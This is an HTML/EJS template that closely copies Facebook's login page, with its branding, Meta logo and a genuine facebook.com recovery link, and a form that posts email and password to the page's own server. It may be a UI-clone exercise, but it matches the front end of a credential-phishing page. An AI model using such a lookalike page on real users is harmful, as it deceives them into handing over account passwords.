<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="shortcut icon" href="/images/Facebook-logo.png"  type="image/png">
    <title>Facebook</title>
    <link rel="stylesheet" href="login.css" />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Noticia+Text:ital,wght@0,400;0,700;1,400;1,700&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
      rel="stylesheet"
    />
  </head>
  <body>
    <main class="body">
      <aside class="login-body">
        <section class="left-section container">
          <h2 class="fb-logo">facebook</h2>

          <p class="content-message">
            Connect with friends and the world around <br />you on Facebook.
          </p>
        </section>

        <section class="right-section container">
          <h2 class="logo-title"></h2>

          <div class="logo-wrapper">
            <svg
              xmlns="http://www.w3.org/2000/svg"
              fill="currentColor"
              class="facebook logo-title"
              viewBox="0 0 16 16"
            >
              <path
                d="M16 8.049c0-4.446-3.582-8.05-8-8.05C3.58 0-.002 3.603-.002 8.05c0 4.017 2.926 7.347 6.75 7.951v-5.625h-2.03V8.05H6.75V6.275c0-2.017 1.195-3.131 3.022-3.131.876 0 1.791.157 1.791.157v1.98h-1.009c-.993 0-1.303.621-1.303 1.258v1.51h2.218l-.354 2.326H9.25V16c3.824-.604 6.75-3.934 6.75-7.951"
              ></path>
            </svg>
          </div>

          <form action="/" method="post">
            <input
              type="text"
              name="email"
              placeholder="Mobile Number or email address"
            /><br /><br />

            <input
              type="password"
              name="password"
              placeholder="Password"
            /><br /><br />

            <div class="btn-container">
              <button type="submit" class="btn">Log In</button>

              <section class="Error">
                <% if(typeof error!=='undefined') {%>
                <span><%=error%></span>
                <%}%>
              </section>

              <a
                href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzMxODAzNTI5LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login&amp;next"
                >Forget Password?</a
              >
            </div>

            <div class="create-account-option">
              <hr />
              <hr />
            </div>

            <div class="create-account-wrapper">
              <button type="button" class="create-account-btn">
                Create new account
              </button>
            </div>
          </form>

          <section class="register-page">
            <svg
              xmlns="http://www.w3.org/2000/svg"
              fill="currentColor"
              class="fb-meta"
              viewBox="0 0 16 16"
            >
              <path
                fill-rule="evenodd"
                d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a55 55 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3q.477-.001.924.122c.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714m1.516 2.224q-.378-.614-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87zM4.846 4.756c.725.1 1.385.634 2.34 2.001A212 212 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264q.136 0 .27.018Z"
              />
            </svg>

            <span class="fb-meta-span">Meta</span>
          </section>
        </section>
      </aside>
    </main>
  </body>
</html>
